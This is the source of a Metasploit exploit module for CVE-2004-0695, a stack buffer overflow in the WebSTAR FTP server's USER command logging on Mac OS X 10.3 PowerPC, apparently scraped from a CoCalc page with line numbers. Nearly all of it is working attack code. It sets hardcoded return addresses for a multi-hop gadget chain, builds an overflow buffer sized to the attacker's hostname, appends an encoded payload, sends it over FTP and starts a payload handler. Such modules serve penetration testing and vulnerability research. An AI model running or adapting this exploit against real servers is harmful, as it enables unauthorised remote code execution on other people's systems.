CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = AverageRanking
8

9
  include Msf::Exploit::Remote::Ftp
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'           => 'WebSTAR FTP Server USER Overflow',
14
      'Description'    => %q{
15
          This module exploits a stack buffer overflow in the logging routine
16
        of the WebSTAR FTP server. Reliable code execution is
17
        obtained by a series of hops through the System library.
18
      },
19
      'Author'         => [ 'ddz', 'hdm' ],
20
      'License'        => MSF_LICENSE,
21
      'References'     =>
22
        [
23
          [ 'CVE', '2004-0695'],
24
          [ 'OSVDB', '7794'],
25
          [ 'BID', '10720'],
26

27
        ],
28
      'Privileged'     => true,
29
      'Payload'        =>
30
        {
31
          'Space'    => 300,
32
          'BadChars' => "\x00\x20\x0a\x0d",
33
          'Compat'   =>
34
            {
35
              'ConnectionType' => "+find"
36
            },
37
        },
38
      'Platform'      => %w{ osx },
39
      'Targets'        =>
40
        [
41
          [
42
            'Mac OS X 10.3.4-10.3.6',
43
            {
44
              'Platform'     => 'osx',
45
              'Arch'          => ARCH_PPC,
46
              'Rets'          => [ 0x9008dce0, 0x90034d60, 0x900ca6d8, 0x90023590 ],
47
            },
48
          ],
49
        ],
50
      'DisclosureDate' => '2004-07-13',
51
      'DefaultTarget' => 0))
52

53
    register_options(
54
      [
55
        OptString.new('MHOST', [ false, "Our IP address or hostname as the target resolves it" ]),
56
      ], self)
57
  end
58

59
  # crazy dino 5-hop foo
60
  #$ret = pack('N', 0x9008dce0); # call $r28, jump r1+120
61
  #$r28 = pack('N', 0x90034d60); # getgid()
62
  #$ptr = pack('N', 0x900ca6d8); # r3 = r1 + 64, call $r30
63
  #$r30 = pack('N', 0x90023590); # call $r3
64

65
  def exploit
66
    connect
67

68
    # The offset to the return address is dependent on the length of our hostname
69
    # as the target system resolves it ( IP or reverse DNS ).
70
    mhost = datastore['MHOST'] || Rex::Socket.source_address(datastore['RHOST'])
71
    basel =  285 - mhost.length
72

73
    print_status("Trying target #{target.name}...")
74

75
    #  ret = 296
76
    # r25  = 260
77
    # r26  = 264
78
    # r27  = 268
79
    # r28  = 272
80
    # r29  = 276
81
    # r30  = 280
82
    # r31  = 284
83

84
    # r1+120 = 408
85

86
    buf                 = rand_text_alphanumeric(basel + 136 + 56, payload_badchars)
87
    buf[basel +  24, 4] = [ target['Rets'][0] ].pack('N') # call $r28, jump r1+120
88
    buf[basel      , 4] = [ target['Rets'][1] ].pack('N') # getgid()
89
    buf[basel + 136, 4] = [ target['Rets'][2] ].pack('N') # (r1+120) => r3 = r1 + 64, call $r30
90
    buf[basel + 120, 4] = [ target['Rets'][3] ].pack('N') # call $r3
91
    buf << payload.encoded
92

93
    send_cmd( ['USER', buf] , true )
94
    send_cmd( ['HELP'] , true )
95

96
    handler
97
    disconnect
98
  end
99
end
100

101